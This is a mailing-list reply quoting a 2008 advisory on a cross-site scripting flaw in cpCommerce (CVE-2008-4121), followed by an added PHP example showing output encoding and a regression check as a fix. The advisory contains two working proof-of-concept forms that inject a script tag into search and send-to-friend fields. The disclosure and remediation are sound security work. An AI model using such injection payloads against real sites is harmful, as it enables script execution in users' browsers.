
Re: [Full-disclosure] Cross Site Scripting (XSS) Vulnerability in cpcommerce, CVE-2008-4121



No one cares about cross site scripting

Fabian Fingerle wrote:
> Cross Site Scripting (XSS) Vulnerability in cpcommerce,
> CVE-2008-4121 
>
> References
>
> http://www.datensalat.eu/~fabian/cve/CVE-2008-4121-cpcommerce.html
> http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
> http://cpcommerce.cpradio.org/
>
> Description
>
> cpCommerce is an open-source e-commerce solution that is maintained by
> templates and modules. 
>
> Example
>
> Assuming cpcommerce is installed on http://localhost/cpcommerce/,
> anybody could inject JavaScript:
>
> <form method="post" action="http://localhost/cpcommerce/search.php">
> <input type="hidden" name="action" value="search.quick">
> <input type="text" name="search" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> <form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
> <input type="hidden" name="action" value="sendtofriend">
> <input type="text" name="name" value='"><script>alert(1)</script>'>
> <input type=submit></form>
>
> Disclosure Timeline
>
> 2008-09-23 Vendor contacted
> 2008-09-23 Vendor released 1.2.4
> 2008-10-19 Published advisory
>
> CVE Information
>
> The Common Vulnerabilities and Exposures (CVE) project has assigned the
> name CVE-2008-4121 to this issue. This is a candidate for inclusion in
> the CVE list (http://cve.mitre.org/), which standardizes names for
> security problems. 
>
> Credits and copyright
>
> This vulnerability was discovered by Fabian Fingerle (published with
> help from Hanno Boeck [0]). It's licensed under the creative commons
> attribution license.
>
> Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de
>
> [0] http://www.hboeck.de
>   
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

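For readers maintaining similar code, the following added example (not cpCommerce source and not part of the advisory or the reply) contrasts raw and encoded output of the `search` field, assuming it is echoed into a double-quoted `value` attribute as the leading `">` of the quoted proof of concept suggests. The function names `render_search_unsafe`, `render_search_safe` and `inspect_markup` are hypothetical.

```php
<?php
// Added example; not cpCommerce code. The render_* functions are hypothetical
// stand-ins for a template that echoes the POSTed "search" field back
// into a double-quoted value="" attribute.

function render_search_unsafe(string $search): string
{
    // Raw interpolation: a '"' in the input ends the attribute early.
    return '<form><input type="text" name="search" value="' . $search . '"></form>';
}

function render_search_safe(string $search): string
{
    // ENT_QUOTES encodes both quote styles in addition to < > and &.
    $enc = htmlspecialchars($search, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form><input type="text" name="search" value="' . $enc . '"></form>';
}

// Parse the markup as an HTML parser would and report what it contains.
function inspect_markup(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate broken markup quietly
    $doc->loadHTML($html);
    libxml_clear_errors();
    $input = $doc->getElementsByTagName('input')->item(0);
    return [
        'scripts' => $doc->getElementsByTagName('script')->length,
        'value'   => $input ? $input->getAttribute('value') : null,
    ];
}

// Constructed input: the string used in the advisory's form fields.
$probe = '"><script>alert(1)</script>';

$before = inspect_markup(render_search_unsafe($probe));
$after  = inspect_markup(render_search_safe($probe));

printf("unsafe: %d script element(s), value=%s\n", $before['scripts'], var_export($before['value'], true));
printf("safe:   %d script element(s), value=%s\n", $after['scripts'], var_export($after['value'], true));

// Regression check for a fix: no new element, and the value round-trips intact.
if ($after['scripts'] !== 0 || $after['value'] !== $probe) {
    throw new RuntimeException('output encoding regression');
}
```

The same check applies to the `name` field of `sendtofriend.php` under the same assumption about where it is reflected.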